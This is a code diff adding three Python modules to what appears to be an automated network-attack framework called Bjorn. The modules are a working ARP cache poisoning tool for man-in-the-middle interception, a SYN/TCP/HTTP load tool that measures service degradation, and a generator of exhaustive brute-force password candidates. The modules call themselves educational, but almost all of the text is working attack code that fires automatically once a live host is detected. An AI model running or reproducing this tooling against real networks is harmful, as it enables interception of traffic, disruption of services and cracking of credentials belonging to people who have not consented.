View File

@@ -0,0 +1,330 @@
"""
arp_spoofer.py — ARP Cache Poisoning for Man-in-the-Middle positioning.
Ethical cybersecurity lab action for Bjorn framework.
Performs bidirectional ARP spoofing between a target host and the network
gateway. Restores ARP tables on completion or interruption.
SQL mode:
- Orchestrator provides (ip, port, row) for the target host.
- Gateway IP is auto-detected from system routing table or shared config.
- Results persisted to JSON output and logged for RL training.
- Fully integrated with EPD display (progress, status, comments).
"""
import os
import time
import logging
import json
import subprocess
import datetime
from typing import Dict, Optional, Tuple
from shared import SharedData
from logger import Logger
logger = Logger(name="arp_spoofer.py", level=logging.DEBUG)
# Silence scapy warnings
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy").setLevel(logging.ERROR)
# ──────────────────────── Action Metadata ────────────────────────
b_class = "ARPSpoof"
b_module = "arp_spoofer"
b_status = "arp_spoof"
b_port = None
b_service = '[]'
b_trigger = "on_host_alive"
b_parent = None
b_action = "aggressive"
b_category = "network_attack"
b_name = "ARP Spoofer"
b_description = (
"Bidirectional ARP cache poisoning between target host and gateway for "
"MITM positioning. Detects gateway automatically, spoofs both directions, "
"and cleanly restores ARP tables on completion. Educational lab use only."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "ARPSpoof.png"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 30
b_cooldown = 3600
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 2
b_risk_level = "high"
b_enabled = 1
b_tags = ["mitm", "arp", "network", "layer2"]
b_args = {
"duration": {
"type": "slider", "label": "Duration (s)",
"min": 10, "max": 300, "step": 10, "default": 60,
"help": "How long to maintain the ARP poison (seconds)."
},
"interval": {
"type": "slider", "label": "Packet interval (s)",
"min": 1, "max": 10, "step": 1, "default": 2,
"help": "Delay between ARP poison packets."
},
}
b_examples = [
{"duration": 60, "interval": 2},
{"duration": 120, "interval": 1},
]
b_docs_url = "docs/actions/ARPSpoof.md"
# ──────────────────────── Constants ──────────────────────────────
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "arp")
class ARPSpoof:
"""ARP cache poisoning action integrated with Bjorn orchestrator."""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self._scapy_ok = False
self._check_scapy()
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except OSError:
pass
logger.info("ARPSpoof initialized")
def _check_scapy(self):
try:
from scapy.all import ARP, Ether, sendp, sr1 # noqa: F401
self._scapy_ok = True
except ImportError:
logger.error("scapy not available — ARPSpoof will not function")
self._scapy_ok = False
# ─────────────────── Identity Cache ──────────────────────
def _refresh_ip_identity_cache(self):
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hn = (r.get("hostnames") or "").split(";", 1)[0]
for ip_addr in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
# ─────────────────── Gateway Detection ──────────────────
def _detect_gateway(self) -> Optional[str]:
"""Auto-detect the default gateway IP."""
gw = getattr(self.shared_data, "gateway_ip", None)
if gw and gw != "0.0.0.0":
return gw
try:
result = subprocess.run(
["ip", "route", "show", "default"],
capture_output=True, text=True, timeout=5
)
if result.returncode == 0 and result.stdout.strip():
parts = result.stdout.strip().split("\n")[0].split()
idx = parts.index("via") if "via" in parts else -1
if idx >= 0 and idx + 1 < len(parts):
return parts[idx + 1]
except Exception as e:
logger.debug(f"Gateway detection via ip route failed: {e}")
try:
from scapy.all import conf as scapy_conf
gw = scapy_conf.route.route("0.0.0.0")[2]
if gw and gw != "0.0.0.0":
return gw
except Exception as e:
logger.debug(f"Gateway detection via scapy failed: {e}")
return None
# ─────────────────── ARP Operations ──────────────────────
@staticmethod
def _get_mac_via_arp(ip: str, iface: str = None, timeout: float = 2.0) -> Optional[str]:
"""Resolve IP to MAC via ARP request."""
try:
from scapy.all import ARP, sr1
kwargs = {"timeout": timeout, "verbose": False}
if iface:
kwargs["iface"] = iface
resp = sr1(ARP(pdst=ip), **kwargs)
if resp and hasattr(resp, "hwsrc"):
return resp.hwsrc
except Exception as e:
logger.debug(f"ARP resolution failed for {ip}: {e}")
return None
@staticmethod
def _send_arp_poison(target_ip, target_mac, spoof_ip, iface=None):
"""Send a single ARP poison packet (op=is-at)."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip
)
kwargs = {"verbose": False}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP poison send failed to {target_ip}: {e}")
@staticmethod
def _send_arp_restore(target_ip, target_mac, real_ip, real_mac, iface=None):
"""Restore legitimate ARP mapping with multiple packets."""
try:
from scapy.all import ARP, Ether, sendp
pkt = Ether(dst=target_mac) / ARP(
op=2, pdst=target_ip, hwdst=target_mac,
psrc=real_ip, hwsrc=real_mac
)
kwargs = {"verbose": False, "count": 5}
if iface:
kwargs["iface"] = iface
sendp(pkt, **kwargs)
except Exception as e:
logger.error(f"ARP restore failed for {target_ip}: {e}")
# ─────────────────── Main Execute ────────────────────────
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""Execute bidirectional ARP spoofing against target host."""
self.shared_data.bjorn_orch_status = "ARPSpoof"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip}
if not self._scapy_ok:
logger.error("scapy unavailable, cannot perform ARP spoof")
return "failed"
target_mac = None
gateway_mac = None
gateway_ip = None
iface = None
try:
if self.shared_data.orchestrator_should_exit:
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or ""
hostname = row.get("Hostname") or row.get("hostname") or ""
# 1) Detect gateway
gateway_ip = self._detect_gateway()
if not gateway_ip:
logger.error(f"Cannot detect gateway for ARP spoof on {ip}")
return "failed"
if gateway_ip == ip:
logger.warning(f"Target {ip} IS the gateway — skipping")
return "failed"
logger.info(f"ARP Spoof: target={ip} gateway={gateway_ip}")
self.shared_data.log_milestone(b_class, "GatewayID", f"Poisoning {ip} <-> {gateway_ip}")
self.shared_data.comment_params = {"ip": ip, "gateway": gateway_ip}
self.shared_data.bjorn_progress = "10%"
# 2) Resolve MACs
iface = getattr(self.shared_data, "default_network_interface", None)
target_mac = self._get_mac_via_arp(ip, iface)
gateway_mac = self._get_mac_via_arp(gateway_ip, iface)
if not target_mac:
logger.error(f"Cannot resolve MAC for target {ip}")
return "failed"
if not gateway_mac:
logger.error(f"Cannot resolve MAC for gateway {gateway_ip}")
return "failed"
self.shared_data.bjorn_progress = "20%"
logger.info(f"Resolved — target_mac={target_mac}, gateway_mac={gateway_mac}")
self.shared_data.log_milestone(b_class, "PoisonActive", f"MACs resolved, starting spoof")
# 3) Spoofing loop
duration = int(getattr(self.shared_data, "arp_spoof_duration", 60))
interval = max(1, int(getattr(self.shared_data, "arp_spoof_interval", 2)))
packets_sent = 0
start_time = time.time()
while (time.time() - start_time) < duration:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit — stopping ARP spoof")
break
self._send_arp_poison(ip, target_mac, gateway_ip, iface)
self._send_arp_poison(gateway_ip, gateway_mac, ip, iface)
packets_sent += 2
elapsed = time.time() - start_time
pct = min(90, int(20 + (elapsed / max(duration, 1)) * 70))
self.shared_data.bjorn_progress = f"{pct}%"
if packets_sent % 20 == 0:
self.shared_data.log_milestone(b_class, "Status", f"Injected {packets_sent} poison pkts")
time.sleep(interval)
# 4) Restore ARP tables
self.shared_data.bjorn_progress = "95%"
logger.info("Restoring ARP tables...")
self.shared_data.log_milestone(b_class, "RestoreStart", f"Healing {ip} and {gateway_ip}")
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
# 5) Save results
elapsed_total = time.time() - start_time
result_data = {
"timestamp": datetime.datetime.now().isoformat(),
"target_ip": ip, "target_mac": target_mac,
"gateway_ip": gateway_ip, "gateway_mac": gateway_mac,
"duration_s": round(elapsed_total, 1),
"packets_sent": packets_sent,
"hostname": hostname, "mac_address": mac
}
try:
ts = datetime.datetime.now().strftime("%Y%m%d_%H%M%S")
out_file = os.path.join(OUTPUT_DIR, f"arp_spoof_{ip}_{ts}.json")
with open(out_file, "w") as f:
json.dump(result_data, f, indent=2)
except Exception as e:
logger.error(f"Failed to save results: {e}")
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Restored tables after {packets_sent} pkts")
return "success"
except Exception as e:
logger.error(f"ARPSpoof failed for {ip}: {e}")
if target_mac and gateway_mac and gateway_ip:
try:
self._send_arp_restore(ip, target_mac, gateway_ip, gateway_mac, iface)
self._send_arp_restore(gateway_ip, gateway_mac, ip, target_mac, iface)
logger.info("Emergency ARP restore sent after error")
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
if __name__ == "__main__":
shared_data = SharedData()
try:
spoofer = ARPSpoof(shared_data)
logger.info("ARPSpoof module ready.")
except Exception as e:
logger.error(f"Error: {e}")

617
actions/berserker_force.py Normal file
View File

@@ -0,0 +1,617 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
berserker_force.py -- Service resilience / stress testing (Pi Zero friendly, orchestrator compatible).
What it does:
- Phase 1 (Baseline): Measures TCP connect response times per port (3 samples each).
- Phase 2 (Stress Test): Runs a rate-limited load test using TCP connect, optional SYN probes
(scapy), HTTP probes (urllib), or mixed mode.
- Phase 3 (Post-stress): Re-measures baseline to detect degradation.
- Phase 4 (Analysis): Computes per-port degradation percentages, writes a JSON report.
This is NOT a DoS tool. It sends measured, rate-limited probes and records how the
target's response times change under light load. Max 50 req/s to stay RPi-safe.
Output is saved to data/output/stress/<ip>_<timestamp>.json
"""
import json
import logging
import os
import random
import socket
import ssl
import statistics
import time
import threading
from datetime import datetime, timezone
from typing import Any, Dict, List, Optional, Tuple
from urllib.request import Request, urlopen
from urllib.error import URLError
from logger import Logger
from actions.bruteforce_common import ProgressTracker
logger = Logger(name="berserker_force.py", level=logging.DEBUG)
# -------------------- Scapy (optional) ----------------------------------------
_HAS_SCAPY = False
try:
from scapy.all import IP, TCP, sr1, conf as scapy_conf # type: ignore
_HAS_SCAPY = True
except ImportError:
logger.info("scapy not available -- SYN probe mode will fall back to TCP connect")
# -------------------- Action metadata (AST-friendly) --------------------------
b_class = "BerserkerForce"
b_module = "berserker_force"
b_status = "berserker_force"
b_port = None
b_parent = None
b_service = '[]'
b_trigger = "on_port_change"
b_action = "aggressive"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 15
b_cooldown = 7200
b_rate_limit = "2/86400"
b_timeout = 300
b_max_retries = 1
b_stealth_level = 1
b_risk_level = "high"
b_enabled = 1
b_category = "stress"
b_name = "Berserker Force"
b_description = (
"Service resilience and stress-testing action. Measures baseline response "
"times, applies controlled TCP/SYN/HTTP load, then re-measures to quantify "
"degradation. Rate-limited to 50 req/s max (RPi-safe). No actual DoS -- "
"just measured probing with structured JSON reporting."
)
b_author = "Bjorn Community"
b_version = "2.0.0"
b_icon = "BerserkerForce.png"
b_tags = ["stress", "availability", "resilience"]
b_args = {
"mode": {
"type": "select",
"label": "Probe mode",
"choices": ["tcp", "syn", "http", "mixed"],
"default": "tcp",
"help": "tcp = connect probe, syn = SYN via scapy (needs root), "
"http = urllib GET for web ports, mixed = random pick per probe.",
},
"duration": {
"type": "slider",
"label": "Stress duration (s)",
"min": 10,
"max": 120,
"step": 5,
"default": 30,
"help": "How long the stress phase runs in seconds.",
},
"rate": {
"type": "slider",
"label": "Probes per second",
"min": 1,
"max": 50,
"step": 1,
"default": 20,
"help": "Max probes per second (clamped to 50 for RPi safety).",
},
}
b_examples = [
{"mode": "tcp", "duration": 30, "rate": 20},
{"mode": "mixed", "duration": 60, "rate": 40},
{"mode": "syn", "duration": 20, "rate": 10},
]
b_docs_url = "docs/actions/BerserkerForce.md"
# -------------------- Constants -----------------------------------------------
_DATA_DIR = "/home/bjorn/Bjorn/data"
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "stress")
_BASELINE_SAMPLES = 3 # TCP connect samples per port for baseline
_CONNECT_TIMEOUT_S = 2.0 # socket connect timeout
_HTTP_TIMEOUT_S = 3.0 # urllib timeout
_MAX_RATE = 50 # hard ceiling probes/s (RPi guard)
_WEB_PORTS = {80, 443, 8080, 8443, 8000, 8888, 9443, 3000, 5000}
# -------------------- Helpers -------------------------------------------------
def _tcp_connect_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Return round-trip TCP connect time in seconds, or None on failure."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(timeout_s)
try:
t0 = time.monotonic()
err = sock.connect_ex((ip, int(port)))
elapsed = time.monotonic() - t0
return elapsed if err == 0 else None
except Exception:
return None
finally:
try:
sock.close()
except Exception:
pass
def _syn_probe_time(ip: str, port: int, timeout_s: float = _CONNECT_TIMEOUT_S) -> Optional[float]:
"""Send a SYN via scapy and measure SYN-ACK time. Falls back to TCP connect."""
if not _HAS_SCAPY:
return _tcp_connect_time(ip, port, timeout_s)
try:
pkt = IP(dst=ip) / TCP(dport=int(port), flags="S", seq=random.randint(0, 0xFFFFFFFF))
t0 = time.monotonic()
resp = sr1(pkt, timeout=timeout_s, verbose=0)
elapsed = time.monotonic() - t0
if resp and resp.haslayer(TCP):
flags = resp[TCP].flags
# SYN-ACK (0x12) or RST (0x14) both count as "responded"
if flags in (0x12, 0x14, "SA", "RA"):
# Send RST to be polite
try:
from scapy.all import send as scapy_send # type: ignore
rst = IP(dst=ip) / TCP(dport=int(port), flags="R", seq=resp[TCP].ack)
scapy_send(rst, verbose=0)
except Exception:
pass
return elapsed
return None
except Exception:
return _tcp_connect_time(ip, port, timeout_s)
def _http_probe_time(ip: str, port: int, timeout_s: float = _HTTP_TIMEOUT_S) -> Optional[float]:
"""Send an HTTP HEAD/GET and measure response time via urllib."""
scheme = "https" if int(port) in {443, 8443, 9443} else "http"
url = f"{scheme}://{ip}:{port}/"
ctx = None
if scheme == "https":
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
try:
req = Request(url, method="HEAD", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp = urlopen(req, timeout=timeout_s, context=ctx) if ctx else urlopen(req, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp.close()
return elapsed
except Exception:
# Fallback: even a refused connection or error page counts
try:
req2 = Request(url, method="GET", headers={"User-Agent": "BjornStress/2.0"})
t0 = time.monotonic()
resp2 = urlopen(req2, timeout=timeout_s, context=ctx) if ctx else urlopen(req2, timeout=timeout_s)
elapsed = time.monotonic() - t0
resp2.close()
return elapsed
except URLError:
return None
except Exception:
return None
def _pick_probe_func(mode: str, port: int):
"""Return the probe function appropriate for the requested mode + port."""
if mode == "tcp":
return _tcp_connect_time
elif mode == "syn":
return _syn_probe_time
elif mode == "http":
if int(port) in _WEB_PORTS:
return _http_probe_time
return _tcp_connect_time # non-web port falls back
elif mode == "mixed":
candidates = [_tcp_connect_time]
if _HAS_SCAPY:
candidates.append(_syn_probe_time)
if int(port) in _WEB_PORTS:
candidates.append(_http_probe_time)
return random.choice(candidates)
return _tcp_connect_time
def _safe_mean(values: List[float]) -> float:
return statistics.mean(values) if values else 0.0
def _safe_stdev(values: List[float]) -> float:
return statistics.stdev(values) if len(values) >= 2 else 0.0
def _degradation_pct(baseline_mean: float, post_mean: float) -> float:
"""Percentage increase from baseline to post-stress. Positive = slower."""
if baseline_mean <= 0:
return 0.0
return round(((post_mean - baseline_mean) / baseline_mean) * 100.0, 2)
# -------------------- Main class ----------------------------------------------
class BerserkerForce:
"""Service resilience tester -- orchestrator-compatible Bjorn action."""
def __init__(self, shared_data):
self.shared_data = shared_data
# ------------------------------------------------------------------ #
# Phase helpers #
# ------------------------------------------------------------------ #
def _resolve_ports(self, ip: str, port, row: Dict) -> List[int]:
"""Gather target ports from the port argument, row data, or DB hosts table."""
ports: List[int] = []
# 1) Explicit port argument
try:
p = int(port) if str(port).strip() else None
if p:
ports.append(p)
except Exception:
pass
# 2) Row data (Ports column, semicolon-separated)
if not ports:
ports_txt = str(row.get("Ports") or row.get("ports") or "")
for tok in ports_txt.replace(",", ";").split(";"):
tok = tok.strip().split("/")[0] # handle "80/tcp"
if tok.isdigit():
ports.append(int(tok))
# 3) DB lookup via MAC
if not ports:
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
if mac:
try:
rows = self.shared_data.db.query(
"SELECT ports FROM hosts WHERE mac_address=? LIMIT 1", (mac,)
)
if rows and rows[0].get("ports"):
for tok in rows[0]["ports"].replace(",", ";").split(";"):
tok = tok.strip().split("/")[0]
if tok.isdigit():
ports.append(int(tok))
except Exception as exc:
logger.debug(f"DB port lookup failed: {exc}")
# De-duplicate, cap at 20 ports (Pi Zero guard)
seen = set()
unique: List[int] = []
for p in ports:
if p not in seen:
seen.add(p)
unique.append(p)
return unique[:20]
def _measure_baseline(self, ip: str, ports: List[int], samples: int = _BASELINE_SAMPLES) -> Dict[int, List[float]]:
"""Phase 1 / 3: TCP connect baseline measurement (always TCP for consistency)."""
baselines: Dict[int, List[float]] = {}
for p in ports:
times: List[float] = []
for _ in range(samples):
if self.shared_data.orchestrator_should_exit:
break
rt = _tcp_connect_time(ip, p)
if rt is not None:
times.append(rt)
time.sleep(0.05) # gentle spacing
baselines[p] = times
return baselines
def _run_stress(
self,
ip: str,
ports: List[int],
mode: str,
duration_s: int,
rate: int,
progress: ProgressTracker,
stress_progress_start: int,
stress_progress_span: int,
) -> Dict[int, Dict[str, Any]]:
"""Phase 2: Controlled stress test with rate limiting."""
rate = max(1, min(rate, _MAX_RATE))
interval = 1.0 / rate
deadline = time.monotonic() + duration_s
# Per-port accumulators
results: Dict[int, Dict[str, Any]] = {}
for p in ports:
results[p] = {"sent": 0, "success": 0, "fail": 0, "times": []}
total_probes_est = rate * duration_s
probes_done = 0
port_idx = 0
while time.monotonic() < deadline:
if self.shared_data.orchestrator_should_exit:
break
p = ports[port_idx % len(ports)]
port_idx += 1
probe_fn = _pick_probe_func(mode, p)
rt = probe_fn(ip, p)
results[p]["sent"] += 1
if rt is not None:
results[p]["success"] += 1
results[p]["times"].append(rt)
else:
results[p]["fail"] += 1
probes_done += 1
# Update progress (map probes_done onto the stress progress range)
if total_probes_est > 0:
frac = min(1.0, probes_done / total_probes_est)
pct = stress_progress_start + int(frac * stress_progress_span)
self.shared_data.bjorn_progress = f"{min(pct, stress_progress_start + stress_progress_span)}%"
# Rate limit
time.sleep(interval)
return results
def _analyze(
self,
pre_baseline: Dict[int, List[float]],
post_baseline: Dict[int, List[float]],
stress_results: Dict[int, Dict[str, Any]],
ports: List[int],
) -> Dict[str, Any]:
"""Phase 4: Build the analysis report dict."""
per_port: List[Dict[str, Any]] = []
for p in ports:
pre = pre_baseline.get(p, [])
post = post_baseline.get(p, [])
sr = stress_results.get(p, {"sent": 0, "success": 0, "fail": 0, "times": []})
pre_mean = _safe_mean(pre)
post_mean = _safe_mean(post)
degradation = _degradation_pct(pre_mean, post_mean)
per_port.append({
"port": p,
"pre_baseline": {
"samples": len(pre),
"mean_s": round(pre_mean, 6),
"stdev_s": round(_safe_stdev(pre), 6),
"values_s": [round(v, 6) for v in pre],
},
"stress": {
"probes_sent": sr["sent"],
"probes_ok": sr["success"],
"probes_fail": sr["fail"],
"mean_rt_s": round(_safe_mean(sr["times"]), 6),
"stdev_rt_s": round(_safe_stdev(sr["times"]), 6),
"min_rt_s": round(min(sr["times"]), 6) if sr["times"] else None,
"max_rt_s": round(max(sr["times"]), 6) if sr["times"] else None,
},
"post_baseline": {
"samples": len(post),
"mean_s": round(post_mean, 6),
"stdev_s": round(_safe_stdev(post), 6),
"values_s": [round(v, 6) for v in post],
},
"degradation_pct": degradation,
})
# Overall summary
total_sent = sum(sr.get("sent", 0) for sr in stress_results.values())
total_ok = sum(sr.get("success", 0) for sr in stress_results.values())
total_fail = sum(sr.get("fail", 0) for sr in stress_results.values())
avg_degradation = (
round(statistics.mean([pp["degradation_pct"] for pp in per_port]), 2)
if per_port else 0.0
)
return {
"summary": {
"ports_tested": len(ports),
"total_probes_sent": total_sent,
"total_probes_ok": total_ok,
"total_probes_fail": total_fail,
"avg_degradation_pct": avg_degradation,
},
"per_port": per_port,
}
def _save_report(self, ip: str, mode: str, duration_s: int, rate: int, analysis: Dict) -> str:
"""Write the JSON report and return the file path."""
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as exc:
logger.warning(f"Could not create output dir {OUTPUT_DIR}: {exc}")
ts = datetime.now(timezone.utc).strftime("%Y-%m-%d_%H-%M-%S")
safe_ip = ip.replace(":", "_").replace(".", "_")
filename = f"{safe_ip}_{ts}.json"
filepath = os.path.join(OUTPUT_DIR, filename)
report = {
"tool": "berserker_force",
"version": b_version,
"timestamp": datetime.now(timezone.utc).isoformat().replace("+00:00", "Z"),
"target": ip,
"config": {
"mode": mode,
"duration_s": duration_s,
"rate_per_s": rate,
"scapy_available": _HAS_SCAPY,
},
"analysis": analysis,
}
try:
with open(filepath, "w") as fh:
json.dump(report, fh, indent=2, default=str)
logger.info(f"Report saved to {filepath}")
except Exception as exc:
logger.error(f"Failed to write report {filepath}: {exc}")
return filepath
# ------------------------------------------------------------------ #
# Orchestrator entry point #
# ------------------------------------------------------------------ #
def execute(self, ip: str, port, row: Dict, status_key: str) -> str:
"""
Main entry point called by the Bjorn orchestrator.
Returns 'success', 'failed', or 'interrupted'.
"""
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# --- Identity cache from row -----------------------------------------
mac = (row.get("MAC Address") or row.get("mac_address") or row.get("mac") or "").strip()
hostname = (row.get("Hostname") or row.get("hostname") or "").strip()
if ";" in hostname:
hostname = hostname.split(";", 1)[0].strip()
# --- Resolve target ports --------------------------------------------
ports = self._resolve_ports(ip, port, row)
if not ports:
logger.warning(f"BerserkerForce: no ports resolved for {ip}")
return "failed"
# --- Read runtime config from shared_data ----------------------------
mode = str(getattr(self.shared_data, "berserker_mode", "tcp") or "tcp").lower()
if mode not in ("tcp", "syn", "http", "mixed"):
mode = "tcp"
duration_s = max(10, min(int(getattr(self.shared_data, "berserker_duration", 30) or 30), 120))
rate = max(1, min(int(getattr(self.shared_data, "berserker_rate", 20) or 20), _MAX_RATE))
# --- EPD / UI updates ------------------------------------------------
self.shared_data.bjorn_orch_status = "berserker_force"
self.shared_data.bjorn_status_text2 = f"{ip} ({len(ports)} ports)"
self.shared_data.comment_params = {"ip": ip, "ports": str(len(ports)), "mode": mode}
# Total units for progress: baseline(15) + stress(70) + post-baseline(10) + analysis(5)
self.shared_data.bjorn_progress = "0%"
try:
# ============================================================== #
# Phase 1: Pre-stress baseline (0 - 15%) #
# ============================================================== #
logger.info(f"Phase 1/4: pre-stress baseline for {ip} on {len(ports)} ports")
self.shared_data.comment_params = {"ip": ip, "phase": "baseline"}
self.shared_data.log_milestone(b_class, "BaselineStart", f"Measuring {len(ports)} ports")
pre_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "15%"
# ============================================================== #
# Phase 2: Stress test (15 - 85%) #
# ============================================================== #
logger.info(f"Phase 2/4: stress test ({mode}, {duration_s}s, {rate} req/s)")
self.shared_data.comment_params = {
"ip": ip,
"phase": "stress",
"mode": mode,
"rate": str(rate),
}
self.shared_data.log_milestone(b_class, "StressActive", f"Mode: {mode} | Duration: {duration_s}s")
# Build a dummy ProgressTracker just for internal bookkeeping;
# we do fine-grained progress updates ourselves.
progress = ProgressTracker(self.shared_data, 100)
stress_results = self._run_stress(
ip=ip,
ports=ports,
mode=mode,
duration_s=duration_s,
rate=rate,
progress=progress,
stress_progress_start=15,
stress_progress_span=70,
)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "85%"
# ============================================================== #
# Phase 3: Post-stress baseline (85 - 95%) #
# ============================================================== #
logger.info(f"Phase 3/4: post-stress baseline for {ip}")
self.shared_data.comment_params = {"ip": ip, "phase": "post-baseline"}
self.shared_data.log_milestone(b_class, "RecoveryMeasure", f"Checking {ip} after stress")
post_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "95%"
# ============================================================== #
# Phase 4: Analysis & report (95 - 100%) #
# ============================================================== #
logger.info("Phase 4/4: analyzing results")
self.shared_data.comment_params = {"ip": ip, "phase": "analysis"}
analysis = self._analyze(pre_baseline, post_baseline, stress_results, ports)
report_path = self._save_report(ip, mode, duration_s, rate, analysis)
self.shared_data.bjorn_progress = "100%"
# Final UI update
avg_deg = analysis.get("summary", {}).get("avg_degradation_pct", 0.0)
self.shared_data.log_milestone(b_class, "Complete", f"Avg Degradation: {avg_deg}% | Report: {os.path.basename(report_path)}")
return "success"
except Exception as exc:
logger.error(f"BerserkerForce failed for {ip}: {exc}", exc_info=True)
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) ---------------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="BerserkerForce (service resilience tester)")
parser.add_argument("--ip", required=True, help="Target IP address")
parser.add_argument("--port", default="", help="Specific port (optional; uses row/DB otherwise)")
parser.add_argument("--mode", default="tcp", choices=["tcp", "syn", "http", "mixed"])
parser.add_argument("--duration", type=int, default=30, help="Stress duration in seconds")
parser.add_argument("--rate", type=int, default=20, help="Probes per second (max 50)")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so the action reads them
sd.berserker_mode = args.mode
sd.berserker_duration = args.duration
sd.berserker_rate = args.rate
act = BerserkerForce(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": args.port,
}
result = act.execute(args.ip, args.port, row, "berserker_force")
print(f"Result: {result}")

View File

@@ -0,0 +1,114 @@
import itertools
import threading
import time
from typing import Iterable, List, Sequence
def _unique_keep_order(items: Iterable[str]) -> List[str]:
seen = set()
out: List[str] = []
for raw in items:
s = str(raw or "")
if s in seen:
continue
seen.add(s)
out.append(s)
return out
def build_exhaustive_passwords(shared_data, existing_passwords: Sequence[str]) -> List[str]:
"""
Build optional exhaustive password candidates from runtime config.
Returns a bounded list (max_candidates) to stay Pi Zero friendly.
"""
if not bool(getattr(shared_data, "bruteforce_exhaustive_enabled", False)):
return []
min_len = int(getattr(shared_data, "bruteforce_exhaustive_min_length", 1))
max_len = int(getattr(shared_data, "bruteforce_exhaustive_max_length", 4))
max_candidates = int(getattr(shared_data, "bruteforce_exhaustive_max_candidates", 2000))
require_mix = bool(getattr(shared_data, "bruteforce_exhaustive_require_mix", False))
min_len = max(1, min_len)
max_len = max(min_len, min(max_len, 8))
max_candidates = max(0, min(max_candidates, 200000))
if max_candidates == 0:
return []
use_lower = bool(getattr(shared_data, "bruteforce_exhaustive_lowercase", True))
use_upper = bool(getattr(shared_data, "bruteforce_exhaustive_uppercase", True))
use_digits = bool(getattr(shared_data, "bruteforce_exhaustive_digits", True))
use_symbols = bool(getattr(shared_data, "bruteforce_exhaustive_symbols", False))
symbols = str(getattr(shared_data, "bruteforce_exhaustive_symbols_chars", "!@#$%^&*"))
groups: List[str] = []
if use_lower:
groups.append("abcdefghijklmnopqrstuvwxyz")
if use_upper:
groups.append("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
if use_digits:
groups.append("0123456789")
if use_symbols and symbols:
groups.append(symbols)
if not groups:
return []
charset = "".join(groups)
existing = set(str(x) for x in (existing_passwords or []))
generated: List[str] = []
for ln in range(min_len, max_len + 1):
for tup in itertools.product(charset, repeat=ln):
pwd = "".join(tup)
if pwd in existing:
continue
if require_mix and len(groups) > 1:
if not all(any(ch in grp for ch in pwd) for grp in groups):
continue
generated.append(pwd)
if len(generated) >= max_candidates:
return generated
return generated
class ProgressTracker:
"""
Thread-safe progress helper for bruteforce actions.
"""
def __init__(self, shared_data, total_attempts: int):
self.shared_data = shared_data
self.total = max(1, int(total_attempts))
self.attempted = 0
self._lock = threading.Lock()
self._last_emit = 0.0
self.shared_data.bjorn_progress = "0%"
def advance(self, step: int = 1):
now = time.time()
with self._lock:
self.attempted += max(1, int(step))
attempted = self.attempted
total = self.total
if now - self._last_emit < 0.2 and attempted < total:
return
self._last_emit = now
pct = min(100, int((attempted * 100) / total))
self.shared_data.bjorn_progress = f"{pct}%"
def set_complete(self):
self.shared_data.bjorn_progress = "100%"
def clear(self):
self.shared_data.bjorn_progress = ""
def merged_password_plan(shared_data, dictionary_passwords: Sequence[str]) -> tuple[list[str], list[str]]:
"""
Returns (dictionary_passwords, fallback_passwords) with uniqueness preserved.
Fallback list is empty unless exhaustive mode is enabled.
"""
dictionary = _unique_keep_order(dictionary_passwords or [])
fallback = build_exhaustive_passwords(shared_data, dictionary)
return dictionary, _unique_keep_order(fallback)

234
